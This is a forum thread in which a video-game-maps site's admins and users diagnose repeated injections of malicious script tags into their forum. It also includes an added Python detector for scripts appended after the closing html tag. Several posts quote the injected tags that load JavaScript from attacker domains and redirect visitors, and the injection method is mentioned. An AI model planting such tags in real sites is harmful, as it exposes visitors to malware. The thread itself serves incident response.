VGMaps
Site Boards => Message Board Help => Topic started by: Wario Bros on May 02, 2010, 11:37:17 am
-
When I get on these forums, my antivirus program keeps making a pop-up saying there is a virus threat called "HTML/ScrInject.B.Gen virus." I tell it to delete it, but when I click on another section of the forums, that same warning message comes up. Is this just me or is it happening to someone else as well?
-
What page is doing this?
-
All of them. I just sent you a PM about this.
-
Hmm. At the very end of every page, after the </html> tag, is the following:
<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>
which redirects to http://www3.workfree36-td.xorg.pl based on your cookies. This domain times out on me, so I can't tell what it is.
EDIT: The kdjkfjskdfjlskdjf.com site is timing out for me now, so every page on the forums tries to load forever.
-
Either my antivirus is disabling it or IE8 is. I am not having any issues with the site, but I do see the code. Working on it now. Seems like it is embedded in the code.
-
The script only does something the first time you view it. It adds a cookie, then sends you to the other site. From then on it sees that you have a cookie already and does nothing.
The real question is how this is happening in the first place. It's not being appended with JavaScript, because it's there even if I get the page with plain old wget. This sounds almost like they somehow edited the site's PHP source :-S
EDIT: Alright, everyone is safe. The site it redirects you to further redirects you to "QoogleSearch.com", which has been de-listed:
Domain Name: QOOGLESEARCH.COM
Registrar: GODADDY.COM, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.SUSPENDED-FOR.SPAM-AND-ABUSE.COM
Name Server: NS2.SUSPENDED-FOR.SPAM-AND-ABUSE.COM
Status: ok
Updated Date: 27-apr-2010
Creation Date: 21-jan-2010
Expiration Date: 21-jan-2011
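A small checker for the appended tag the two posts above describe, added here as an example and not code from the thread or from the forum software. It takes page HTML as saved by wget/curl (the post notes the tag is present even with plain wget, and a browser that already has the cookie shows nothing) and reports any script loaded after the closing html tag, which a normal template never does. The pages and the `example.invalid` domain are constructed stand-ins, not captures from the forum.

```python
import re

# Closing tag of a well-formed page; anything served after it is suspect.
HTML_CLOSE = re.compile(r"</html\s*>", re.IGNORECASE)
# <script ... src="..."> with either quote style.
SCRIPT_SRC = re.compile(r"""<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


def trailing_script_srcs(html: str) -> list:
    """Return the src URL of every <script> that appears after the first </html>.

    Scripts inside <body> are left alone; only the appended-after-close pattern
    from the thread is flagged.
    """
    close = HTML_CLOSE.search(html)
    if close is None:
        return []  # no </html> at all: not this injection pattern
    return SCRIPT_SRC.findall(html[close.end():])


def audit_pages(pages: dict) -> dict:
    """Map page name -> trailing script URLs, keeping only pages that have some.

    'pages' is {name: html}, e.g. files saved with `wget -O board.html <url>`.
    """
    hits = {}
    for name, html in pages.items():
        srcs = trailing_script_srcs(html)
        if srcs:
            hits[name] = srcs
    return hits


# Constructed sample pages (not captured from the forum). example.invalid is a
# reserved name used here as a stand-in for the attacker's domain.
SAMPLE_CLEAN = (
    "<html><head><title>Board</title></head>\n"
    '<body><script src="/js/board.js"></script><p>Hello</p></body>\n'
    "</html>\n"
)
SAMPLE_INFECTED = SAMPLE_CLEAN + '<script src="http://example.invalid/kp.php"></script>\n'

if __name__ == "__main__":
    report = audit_pages({"index.html": SAMPLE_CLEAN, "board.html": SAMPLE_INFECTED})
    for name, srcs in report.items():
        print(f"{name}: script(s) after </html>: {', '.join(srcs)}")
```

Fetch every board page with wget rather than a browser before running this, since the injected script sets a cookie and then does nothing on later visits, which can make a still-infected page look clean.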
-
That's the infection I was talking about. And it looks like the script is still there at the bottom of the page. The site gives you a virus, or it did before it was shut down.
-
I overwrote the source code with the original files, hence the current lack of ads at the footer. No luck in removing it though. Currently creating a new directory with a completely fresh install, importing the DB now.
EDIT: Ok, everything is switched over to a completely fresh install with the old DB imported in. Anyone see anything off? Let me know.
-
That's good to hear! BTW, I no longer get that virus message anymore. I'm kinda surprised how fast this was handled. :)
-
Did you save the infected files for further inspection? This might just happen again if you don't find the cause.
-
Doesn't seem fast to me... 4 hours of trying stuff just to let it come down to a fresh install. Still will be looking at the old files to see if I can't find what was changed in case it happens again.
EDIT: We are thinking the same.
-
If you have any files or directories that are world-writable then other people on your shared server (http://www.yougetsignal.com/tools/web-sites-on-web-server/) can drop files or add exploits. Also, any vulnerabilities in the forum will get you targeted, the best mitigation being to make some non-standard modifications (e.g. moving form fields around, hiding the version number) to make it harder to script and/or Google for.
(I've had to deal with these kinds of problems for a while... the only real solution is to run custom software, on a private server, and either not be big enough to get targeted or have really robust software. Also, daily backups of the files and DB.)
-
Also, some of the attachments/avatars have been corrupted. My avatar has had two bytes removed, for example.
-
Sorry Maxim. It doesn't look like I can do anything about the avatars. You'll have to reload it back up.
-
Not that avatars are a chief concern, but don't you have backups? My avatar and several others' have disappeared, and it makes me concerned that other things might be corrupted.
-
Unless you've reuploaded it, I can see yours just fine.
It seems almost all of the attachments in the Platinum thread are corrupted, so I'm wondering if it didn't corrupt almost all images.
-
Maybe your browser attempts to display the corrupted PNG where mine just gives up. I saved it to my hard drive and none of my viewers will display it.
-
I recently backed up the attachments (a few days ago - but don't think that's related - or at least I hope not), so shouldn't reuploading the contents of the "attachments" folder fix them? When I get home I'll give that a shot.
Though I'm more concerned about something more critical or irreplaceable being corrupted, and if whatever's causing the corruption is still around.
-
Maybe your browser attempts to display the corrupted PNG where mine just gives up. I saved it to my hard drive and none of my viewers will display it.
Oh, NOW it's broken. I hate the way this browser uses its cache.
-
As long as the site is on a shared server, the possibility of this happening again is always going to exist. And it's not a matter of forum software, just a matter of root security. The problem was that a script pasted eval(base64_decode()) into every page in the forum. I'm surprised it didn't go higher into the main site, but it may have just been targeting the forum itself.
-
It has happened again :(
-
The bottom of the page contains:
<script src="http://holasionweb.com/oo.php"></script>
...which serves some javascript that uses a cookie to redirect once to suitcase52td.net which is totally blocked for me...
-
Fixed
-
Danger: AVG Active Surf-Shield has detected active threats on this page and has blocked access for your protection.
The page you are trying to access has been identified as a known exploit, phishing, or social engineering web site and therefore has been blocked for your safety. Without protection, such as that in the AVG Security Toolbar and AVG, your computer is at risk of being compromised, corrupted or having your identity stolen. Please follow one of the suggestions below to continue.
URL: losotrana.com/js.php
Name: Virus found JS/Redir
That's what I'm getting now.
-
Same thing for me. Every page on the forum causes Avast to report that trojan horse...
-
I'm of the opinion that the problem isn't that this site is on a shared server, but that something is attacking externally. None of this was happening until the captcha was changed, and only the forums are targeted. If the server admins are worth anything they keep each site in private directories.
[EDIT] Nevermind, it appears that it definitely is a problem with GoDaddy. Lots (http://wordpress.org/support/topic/394255) of other people with different software are experiencing this. I guess we'll just have to wait it out.
Just a thought -- if the base64_decode command is getting pasted at the very end of the php file, what if you (bustin98) just stick an exit() at the end? That way anything after that point will be ignored, should this happen again.
-
It's at the beginning of the file. Wish there was something I could put in to kill it. I changed permissions on the files but that didn't do a thing, and it wouldn't if the source was above the basic web user. Need to just get off the shared server, or on one that has better security.
-
Well, did a deep cleaning of the site, found a random file that may be the cause or a cause of the infection. Got rid of it. I also renamed the cookie name, so sorry about causing everyone to have to log back in... :D Seems the infection is self-replicating and all it had to do was get in once. Every time someone hit an infected page, it ran through the site and added the code if it didn't already exist.
Maybe now things can go back to normal?
-
It's happened again. The following script has been added to the forum code.
<script src="http://myblindstudioinfoonline.com/ll.php"></script>
Those without reliable virus protection beware.
-
Uh oh. For some reason, I'm not getting any kind of warning and nothing is happening. I hope this gets taken care of before something does.
-
Should be good now.